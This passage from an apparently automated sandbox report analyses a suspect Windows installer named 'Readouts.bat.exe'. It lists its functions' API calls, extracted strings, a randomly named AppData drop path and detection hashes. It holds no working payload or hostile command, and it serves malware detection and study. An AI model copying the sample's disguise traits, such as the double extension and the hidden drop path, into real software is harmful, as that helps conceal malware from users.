                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon
                                                • API String ID: 542301482-3194159820
                                                • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404458
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404489
                                                • GetSysColor.USER32(?), ref: 0040449A
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                • lstrlenW.KERNEL32(?), ref: 004044BB
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                • SendMessageW.USER32(00000000), ref: 0040453D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                • SetCursor.USER32(00000000), ref: 004045BC
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                • SetCursor.USER32(00000000), ref: 004045D8
                                                • SendMessageW.USER32(00000111,?,00000000), ref: 00404607
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: 1C@$Call$N
                                                • API String ID: 3103080414-3974410273
                                                • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                • wsprintfA.USER32 ref: 00405F4F
                                                • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 589700163-3918093107
                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                • GetSysColor.USER32(00000000), ref: 004042BD
                                                • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                • SetBkMode.GDI32(?,?), ref: 004042D5
                                                • GetSysColor.USER32(?), ref: 004042E8
                                                • SetBkColor.GDI32(?,?), ref: 004042F8
                                                • DeleteObject.GDI32(?), ref: 00404312
                                                • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                Function 73CB2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB24DA
                                                  • Part of subcall function 73CB122C: lstrcpynW.KERNEL32(00000000,?,73CB12DF,00000019,73CB11BE,-000000A0), ref: 73CB123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 73CB2460
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73CB247B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @H3w
                                                • API String ID: 4216380887-4275297014
                                                • Opcode ID: 7e6db105668cfdaf10df5850716343275bbd05e13d63e890fc236f12ceee4147
                                                • Instruction ID: e708a5c63c7eb8f6fe8a7b493d9d127aa2b642b178e22155aa8170104aeab704
                                                • Opcode Fuzzy Hash: 7e6db105668cfdaf10df5850716343275bbd05e13d63e890fc236f12ceee4147
                                                • Instruction Fuzzy Hash: EE41AEB1008399EFD310EF62E844B6677BDEB44310B11491DE58BCB981E739A985CF61
                                                Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                • GetMessagePos.USER32 ref: 00404BD9
                                                • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                • MulDiv.KERNEL32(000F28B5,00000064,000F2AB9), ref: 00402E3C
                                                • wsprintfW.USER32 ref: 00402E4C
                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E46
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                Function 73CB256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 73CB121B: GlobalAlloc.KERNEL32(00000040,?,73CB123B,?,73CB12DF,00000019,73CB11BE,-000000A0), ref: 73CB1225
                                                • GlobalFree.KERNEL32(?), ref: 73CB265B
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB2690
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: d63227dde3991521837d7470231636860127855497a03f5377926abd9dd0a2ba
                                                • Instruction ID: 23bb332a7c44df847304b6cfa1d61f172c09f92d2652a16d5c845bf14489aca4
                                                • Opcode Fuzzy Hash: d63227dde3991521837d7470231636860127855497a03f5377926abd9dd0a2ba
                                                • Instruction Fuzzy Hash: 893102321041C9EFD712EF55DC98F2A7BBAFF893047250529F186CB260E739AC048B21
                                                Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                • wsprintfW.USER32 ref: 00404B52
                                                • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                Strings
                                                Memory Dump Source
